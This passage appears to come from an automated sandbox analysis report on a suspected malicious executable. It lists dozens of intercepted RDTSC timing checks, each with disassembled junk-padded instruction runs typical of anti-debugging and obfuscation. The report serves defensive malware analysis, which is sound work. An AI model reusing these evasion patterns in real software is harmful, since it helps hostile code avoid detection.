                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F0B861 second address: F0B88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB15h 0x00000009 popad 0x0000000a pushad 0x0000000b jno 00007FF34080AB06h 0x00000011 pushad 0x00000012 popad 0x00000013 jbe 00007FF34080AB06h 0x00000019 popad 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F79AE2 second address: F79AEF instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F79AEF second address: F79AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F79AF6 second address: F79B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3408102FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F791E3 second address: F791EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F791EB second address: F791EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F791EF second address: F791F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F791F5 second address: F791FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F793A1 second address: F793BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB15h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F793BA second address: F793D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF3408102FAh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FF3408102F6h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F79512 second address: F79516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F79516 second address: F7951A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F7968A second address: F79692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F7E7D5 second address: F7E7DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F7E90A second address: F7E90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F83B95 second address: F83B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F83B99 second address: F83BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FF34080AB06h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F83BA7 second address: F83BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F82885 second address: F82889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F82EB3 second address: F82EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F82EB7 second address: F82EC1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F82EC1 second address: F82EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F82EC5 second address: F82EE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007FF34080AB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF34080AB0Fh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F82EE6 second address: F82EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF3408102F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F83618 second address: F83629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007FF34080AB0Ch 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F83629 second address: F8363F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF340810301h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F837AE second address: F837B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F837B4 second address: F837B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F837B8 second address: F837E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 jnc 00007FF34080AB06h 0x00000017 jmp 00007FF34080AB0Ch 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jc 00007FF34080AB06h 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F870F7 second address: F87106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8B871 second address: F8B875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8B875 second address: F8B881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007FF3408102F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8B881 second address: F8B886 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8B886 second address: F8B8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810308h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8B8A9 second address: F8B8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB12h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jmp 00007FF34080AB15h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8BA4A second address: F8BA5C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF3408102F8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FF3408102F6h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8C25A second address: F8C25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8C25E second address: F8C28A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810302h 0x00000007 jmp 00007FF340810306h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8C43C second address: F8C455 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB08h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF34080AB0Bh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8C455 second address: F8C459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8C708 second address: F8C716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF34080AB06h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F39077 second address: F3909A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF340810302h 0x0000000c jmp 00007FF3408102FCh 0x00000011 popad 0x00000012 jnp 00007FF34081031Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F3909A second address: F3909E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F0D299 second address: F0D29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F0D29D second address: F0D2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F0D2B1 second address: F0D2B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F8CB2C second address: F8CB3F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF34080AB08h 0x00000008 pushad 0x00000009 jnp 00007FF34080AB06h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F93169 second address: F9316D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F9316D second address: F93181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FF34080AB0Eh 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F92958 second address: F9295C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F9295C second address: F92965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F92965 second address: F9296B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F936E4 second address: F93712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FF34080AB19h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F93712 second address: F93716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F93837 second address: F93849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Dh 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F93849 second address: F9384E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F986F1 second address: F986FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF34080AB06h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5E344 second address: F38539 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007FF340810308h 0x00000013 call 00007FF3408102FBh 0x00000018 mov edx, dword ptr [ebp+122D2C86h] 0x0000001e pop edx 0x0000001f pop ecx 0x00000020 lea eax, dword ptr [ebp+12493071h] 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007FF3408102F8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 push eax 0x00000041 push edi 0x00000042 pushad 0x00000043 jmp 00007FF3408102FDh 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b pop edi 0x0000004c mov dword ptr [esp], eax 0x0000004f xor dword ptr [ebp+122D3552h], esi 0x00000055 call dword ptr [ebp+122D1CC0h] 0x0000005b push eax 0x0000005c ja 00007FF340810325h 0x00000062 push eax 0x00000063 push edx 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 jmp 00007FF340810305h 0x0000006b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5E820 second address: F5E824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5E824 second address: F5E82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5E8FE second address: F5E919 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF34080AB11h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5E919 second address: F5E91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5EB76 second address: F5EB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5EB7C second address: F5EBA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e movsx edi, si 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 ja 00007FF3408102F6h 0x0000001d popad 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5ED01 second address: F5ED0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5ED0B second address: F5ED0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5EE4D second address: F5EE52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5F570 second address: F5F574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5F62F second address: F5F633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5F633 second address: F39077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FF3408102F8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+12493071h] 0x0000002a nop 0x0000002b jmp 00007FF340810301h 0x00000030 push eax 0x00000031 push edx 0x00000032 jl 00007FF3408102FCh 0x00000038 jc 00007FF3408102F6h 0x0000003e pop edx 0x0000003f nop 0x00000040 jmp 00007FF340810306h 0x00000045 call dword ptr [ebp+122D1C2Bh] 0x0000004b pushad 0x0000004c jmp 00007FF3408102FDh 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pop esi 0x00000055 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F97B34 second address: F97B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F97B3A second address: F97B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F97B42 second address: F97B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF34080AB06h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F97B53 second address: F97B71 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF3408102F6h 0x00000008 jo 00007FF3408102F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FF340810302h 0x00000016 jnc 00007FF3408102F6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F97CBA second address: F97CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Eh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F97CCC second address: F97CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F97CD2 second address: F97CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FF34080AB0Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F98127 second address: F98144 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF3408102FEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F98144 second address: F9814A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F982AB second address: F982AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F982AF second address: F982C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF34080AB0Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F982C8 second address: F982E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FF340810301h 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F9C0AF second address: F9C0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F9C0B8 second address: F9C0CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF3408102FCh 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F9C0CD second address: F9C0D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA010E second address: FA0112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA0112 second address: FA011B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F1C3D1 second address: F1C3F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF3408102FEh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F1C3F4 second address: F1C3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F9FBB9 second address: F9FBC3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF3408102FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F9FBC3 second address: F9FBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FF34080AB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F9FBD3 second address: F9FBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
